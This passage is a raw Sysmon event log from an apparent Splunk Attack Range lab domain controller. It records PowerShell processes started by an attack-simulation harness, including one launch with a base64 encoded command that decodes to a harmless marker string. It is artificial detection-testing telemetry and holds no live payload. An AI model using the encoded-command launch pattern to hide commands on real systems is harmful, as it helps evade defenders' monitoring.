Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7F849B006D3FE3A766FB96FE14A34B4B,SHA256=FABE06D997DD0DE439CD7C616102BBAB6E0D763FECDD783A64EBB457F5CD060D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002235325Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.481{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D46-603E-66AA-00000000AD01}7084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235324Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.481{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D46-603E-66AA-00000000AD01}7084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235323Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.434{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D46-603E-66AA-00000000AD01}7084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235322Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.434{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D46-603E-66AA-00000000AD01}7084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002235321Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:52:22.423{05ADC7E1-6D46-603E-66AA-00000000AD01}7084\PSHost.132591775423289435.7084.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002235320Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.403{05ADC7E1-6D46-603E-66AA-00000000AD01}7084ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_0iy4pske.ohm.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235319Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.403{05ADC7E1-6D46-603E-66AA-00000000AD01}7084ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_l5sbg1mc.zmk.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002235318Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.387{05ADC7E1-6D46-603E-66AA-00000000AD01}7084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_l5sbg1mc.zmk.ps12021-03-02 16:52:22.387 10341000x80000000000000002235317Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.356{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-6D46-603E-66AA-00000000AD01}7084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000002235316Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:12.228{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60120-false10.0.1.12-8000- 10341000x80000000000000002235315Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.323{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6D46-603E-66AA-00000000AD01}7084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235314Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.323{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235313Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.323{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235312Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.323{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235311Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.323{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235310Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.323{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6D46-603E-66AA-00000000AD01}7084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002235309Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.323{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6D46-603E-66AA-00000000AD01}7084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+700132a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49ac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49a232(wow64) 154100x80000000000000002235308Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.328{05ADC7E1-6D46-603E-66AA-00000000AD01}7084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -EncodedCom VwByAGkAdABlAC0ASABvAHMAdAAgAGEAYgAxAGUANAA2AGQAMwAtADgAYwBkADkALQA0AGIAYwAzAC0AOQA4ADEAYgAtAGEANgBkADYAMABiADQAMgA1ADgAZQBmAA==C:\Users\Administrator\Downloads\AtomicTestHarnesses\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000002235307Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.293{05ADC7E1-6D46-603E-65AA-00000000AD01}9584ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002235306Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.200{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D46-603E-65AA-00000000AD01}9584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235305Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.200{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D46-603E-65AA-00000000AD01}9584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002235304Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.184{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75BEDA51104CAEC053373D62340C4395,SHA256=7F1B5FDBE1679FA79EE95557791C0C88F65E9A8805A4C5112BE445EA82F114E1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002235303Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.153{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D46-603E-65AA-00000000AD01}9584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235302Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.153{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D46-603E-65AA-00000000AD01}9584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002235301Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:52:22.123{05ADC7E1-6D46-603E-65AA-00000000AD01}9584\PSHost.132591775420356044.9584.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002235300Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.106{05ADC7E1-6D46-603E-65AA-00000000AD01}9584ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_3u1ukn4o.ui1.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235299Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.106{05ADC7E1-6D46-603E-65AA-00000000AD01}9584ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_ufgxf2ek.4qi.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002235298Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.090{05ADC7E1-6D46-603E-65AA-00000000AD01}9584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_ufgxf2ek.4qi.ps12021-03-02 16:52:22.090 10341000x80000000000000002235297Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.075{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-6D46-603E-65AA-00000000AD01}9584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235296Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.023{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6D46-603E-65AA-00000000AD01}9584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235295Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.023{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235294Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 